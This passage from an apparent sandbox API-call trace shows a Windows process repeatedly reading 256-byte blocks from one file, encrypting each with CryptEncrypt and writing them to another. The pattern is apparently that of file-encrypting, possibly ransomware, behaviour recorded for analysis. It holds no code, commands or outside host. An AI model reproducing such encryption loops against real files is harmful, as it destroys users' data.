lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.033] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.033] GetLastError () returned 0x0 [0144.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.033] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.033] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.033] GetLastError () returned 0x0 [0144.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.034] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.034] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.034] GetLastError () returned 0x0 [0144.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.034] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.034] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.034] GetLastError () returned 0x0 [0144.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.034] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.034] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.034] GetLastError () returned 0x0 [0144.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.034] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.034] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.034] GetLastError () returned 0x0 [0144.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.034] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.034] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.034] GetLastError () returned 0x0 [0144.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.034] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.034] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.034] GetLastError () returned 0x0 [0144.034] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.035] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.035] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.035] GetLastError () returned 0x0 [0144.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.035] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.035] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.035] GetLastError () returned 0x0 [0144.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.035] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.035] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.035] GetLastError () returned 0x0 [0144.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.035] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.035] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.035] GetLastError () returned 0x0 [0144.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.035] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.035] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.035] GetLastError () returned 0x0 [0144.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.035] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.035] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.035] GetLastError () returned 0x0 [0144.035] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.035] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.036] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.036] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.036] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.036] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.036] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.036] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.036] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.036] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.036] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.036] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.036] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.036] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.036] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.037] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.037] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.037] GetLastError () returned 0x0 [0144.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.037] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.037] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.037] GetLastError () returned 0x0 [0144.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.037] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.037] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.037] GetLastError () returned 0x0 [0144.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.037] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.037] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.037] GetLastError () returned 0x0 [0144.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.037] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.037] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.037] GetLastError () returned 0x0 [0144.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.037] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.037] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.037] GetLastError () returned 0x0 [0144.037] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.037] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.038] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.038] GetLastError () returned 0x0 [0144.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.038] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.038] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.038] GetLastError () returned 0x0 [0144.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.038] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.038] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.038] GetLastError () returned 0x0 [0144.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.038] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.038] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.038] GetLastError () returned 0x0 [0144.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.038] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.038] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.038] GetLastError () returned 0x0 [0144.038] WriteFile (in: hFile=0x588, lpBuffer=0x1d465dc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d465dc0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.038] ReadFile (in: hFile=0x1618, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.038] CryptEncrypt (in: hKey=0x982110, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d465dc0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d465dc0*, 